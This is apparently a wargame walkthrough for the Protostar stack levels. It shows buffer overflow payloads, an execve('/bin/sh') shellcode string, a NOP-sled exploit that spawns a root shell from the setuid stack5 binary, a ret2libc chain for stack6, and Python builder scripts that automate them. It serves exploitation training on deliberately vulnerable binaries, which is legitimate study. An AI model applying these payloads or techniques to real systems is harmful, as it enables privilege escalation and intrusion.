Protostar

Stack 0

Simple buffer overflow: buffer is 64 bytes, so anything longer overwrites the modified variable that sits after it:

python -c 'print "A" * 80' | /opt/protostar/bin/stack0

Stack 3

Python 2, as shipped on the Protostar VM:

import struct
# 64 bytes fill buffer[64]; the next 4 bytes land on the function pointer fp
padding = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPP"
# chr(0x51) prints the character with that code ('Q'), handy for telling which group of padding showed up in the crash
padding += struct.pack("I", 0x08048424)  # address of win(), little endian: \x24\x84\x04\x08
print padding

Stack 4

Overwrite the saved return address (the eip pushed by the call to main), so that when main's ret executes we land where we want, here win().

import struct
padding = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRR"  # 72 bytes: buffer[64] plus alignment
ebp = "AAAA"                        # saved ebp
eip = struct.pack("I", 0x080483f4)  # address of win(), packed as a little-endian 4-byte string
print padding + ebp + eip

Stack 5

Getting root privileges: stack5 is setuid root, so a shell spawned from it runs as root. There is no win() function this time, so the return address is pointed back into the stack, at the esp value seen in gdb right after ret (plus a few bytes), where a NOP sled followed by the payload has been placed.

import struct
padding = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS"  # 76 bytes up to the saved return address
eip = struct.pack("I", 0xbffff7c0 + 30)  # esp after ret as seen in gdb, plus 30 bytes into the sled
nopslide = "\x90" * 100                  # NOPs absorb small differences in the stack address
payload = "\xCC" * 4                     # int3: traps (SIGTRAP) if we land in the sled, used to confirm the address before real shellcode
print padding + eip + nopslide + payload

Once the int3 trap confirms the address, replace the payload with execve("/bin/sh") shellcode from shell-storm.org:

payload = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"

When executing, use the command:

(python exploit.py; cat) | /opt/protostar/bin/stack5

Then we have the shell. The cat keeps stdin open after the exploit output has been sent, so the spawned /bin/sh reads commands from the terminal; without it the shell would hit EOF and exit immediately.
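The stack5 layout above (padding, return address, NOP sled, shellcode) as a payload builder in Python 3. This is an added example, not code from the page: it assumes the 76-byte offset and the esp value 0xbffff7c0 used above, and adds the two checks worth doing before sending anything, that the chosen return address actually falls inside the sled, and that no byte of the payload is a newline, since gets() stops reading there. The names lands_in_sled, build_payload and int3_probe are this example's own.

```python
import struct
import sys

# Constructed from the stack5 layout used on this page: 64-byte buffer, then
# alignment padding and the saved ebp; the saved return address starts at
# offset 76.  Confirm the offset from the crash in gdb before relying on it.
EIP_OFFSET = 76

# execve("/bin//sh") shellcode quoted on the page (shell-storm.org), 28 bytes.
SHELLCODE = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
             b"\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80")

# stack5 reads input with gets(), which stops at a newline, so a 0x0a byte
# anywhere in the payload (address, sled or shellcode) truncates it.
BAD_BYTES = {0x0a}


def p32(value):
    """Pack a 32-bit address little-endian (what struct.pack("I") does on x86)."""
    return struct.pack("<I", value)


def lands_in_sled(ret_addr, sled_start, sled_len):
    """True if ret_addr points inside the NOP sled.

    sled_start is the value esp has right after main's ret (the page reads it
    in gdb): the sled is written directly after the saved eip, so that is
    where it begins.  Any address in that range slides into the shellcode.
    """
    return sled_start <= ret_addr < sled_start + sled_len


def build_payload(ret_addr, shellcode=SHELLCODE, sled_len=100, eip_offset=EIP_OFFSET):
    """padding | ret_addr | NOP sled | shellcode, refusing payloads gets() would cut."""
    payload = b"A" * eip_offset + p32(ret_addr) + b"\x90" * sled_len + shellcode
    for i, b in enumerate(payload):
        if b in BAD_BYTES:
            raise ValueError("bad byte 0x%02x at offset %d" % (b, i))
    return payload


def int3_probe(ret_addr, sled_len=100):
    """Same layout with four int3 bytes in place of the shellcode: if the
    return address guess is right the process stops with SIGTRAP, which is
    easier to confirm in gdb than a shell that silently fails to appear."""
    return build_payload(ret_addr, shellcode=b"\xcc" * 4, sled_len=sled_len)


if __name__ == "__main__":
    # esp observed in gdb after ret (0xbffff7c0 on the page), plus 30 bytes into the sled
    ESP_AFTER_RET = 0xbffff7c0
    target = ESP_AFTER_RET + 30
    assert lands_in_sled(target, ESP_AFTER_RET, 100)
    # Raw bytes, not text: (python3 exploit.py; cat) | /opt/protostar/bin/stack5
    sys.stdout.buffer.write(build_payload(target))
```

The payload is written to stdout as raw bytes so it can be piped straight into the binary the same way as the page's exploit.py. Stack addresses outside gdb differ slightly from those inside it (the environment is laid out differently), which is exactly what the 100-byte sled is there to absorb.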

Stack 6

stack6 refuses to return to the stack (it rejects any return address whose top byte is 0xbf), so instead of shellcode on the stack we return into libc's system() with "/bin/sh" as its argument. The offset of the "/bin/sh" string inside the library:

strings -a -t x /lib/libc-2.11.2.so | grep "/bin/sh"

In gdb, info proc map gives the base address libc is mapped at; the string lives at base + offset, which x/s base+offset confirms. 0xb7fb64bf is used as that address below, and 0xb7ecffb0 as the address of system() (p system in gdb).

import struct
padding = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS"  # up to the saved return address
system = struct.pack("I", 0xb7ecffb0)   # main returns into system()
return_after_system = "AAAA"            # where system() returns to (junk, crashes once the shell exits)
bin_sh = struct.pack("I", 0xb7fb64bf)   # first argument of system(): pointer to "/bin/sh" in libc
print padding + system + return_after_system + bin_sh
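The ret2libc chain above, with the address arithmetic from the strings/info proc map procedure, as a Python 3 builder. This is an added example, not the page's code. The libc base (0xb7e97000) and "/bin/sh" offset (0x11f4bf) are assumed values chosen so that their sum reproduces the page's 0xb7fb64bf; on a real VM the base comes from info proc map and the offset from strings. The builder also applies stack6's own filter, (ret & 0xbf000000) == 0xbf000000, to the address it is about to return into, so a stack address is refused before it is sent. The names libc_addr, stack6_allows and build_ret2libc are this example's own.

```python
import struct
import sys

# Assumed values, constructed for this example: libc base as read from
# `info proc map` in gdb, and the "/bin/sh" offset from `strings -a -t x`.
# Their sum gives the 0xb7fb64bf used on the page; the real base on a given
# Protostar VM must be taken from gdb.
LIBC_BASE = 0xb7e97000
BINSH_OFFSET = 0x11f4bf
# Address of system() used on the page (`p system` in gdb).
SYSTEM_ADDR = 0xb7ecffb0

# Offset to the saved return address; matches the padding used above.
# Confirm it from the crash in gdb, it differs between levels.
EIP_OFFSET = 76


def p32(value):
    """Pack a 32-bit address little-endian."""
    return struct.pack("<I", value)


def libc_addr(base, offset):
    """Absolute address of a libc symbol or string: mapping base + file offset."""
    return base + offset


def stack6_allows(ret_addr):
    """stack6 rejects return addresses on the stack with
    (ret & 0xbf000000) == 0xbf000000.  libc at 0xb7... passes, 0xbf... does not."""
    return (ret_addr & 0xbf000000) != 0xbf000000


def build_ret2libc(system_addr, binsh_addr, ret_after=0x41414141, eip_offset=EIP_OFFSET):
    """padding | &system | return address for system() | &"/bin/sh".

    When main returns into system() the stack must look like a normal call:
    the word after the return address is where system() itself returns to
    (junk here, so the process crashes after the shell exits), and the word
    after that is its first argument, the pointer to "/bin/sh".
    """
    if not stack6_allows(system_addr):
        raise ValueError("0x%08x would be rejected by stack6's return address check" % system_addr)
    payload = b"A" * eip_offset + p32(system_addr) + p32(ret_after) + p32(binsh_addr)
    if b"\n" in payload:
        raise ValueError("payload contains a newline, gets() would truncate it")
    return payload


if __name__ == "__main__":
    binsh = libc_addr(LIBC_BASE, BINSH_OFFSET)
    # Raw bytes: (python3 exploit.py; cat) | /opt/protostar/bin/stack6
    sys.stdout.buffer.write(build_ret2libc(SYSTEM_ADDR, binsh))
```

Keeping base and offset separate is what makes the script reusable: if libc is mapped elsewhere, only LIBC_BASE changes, and the same offsets from strings still apply.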
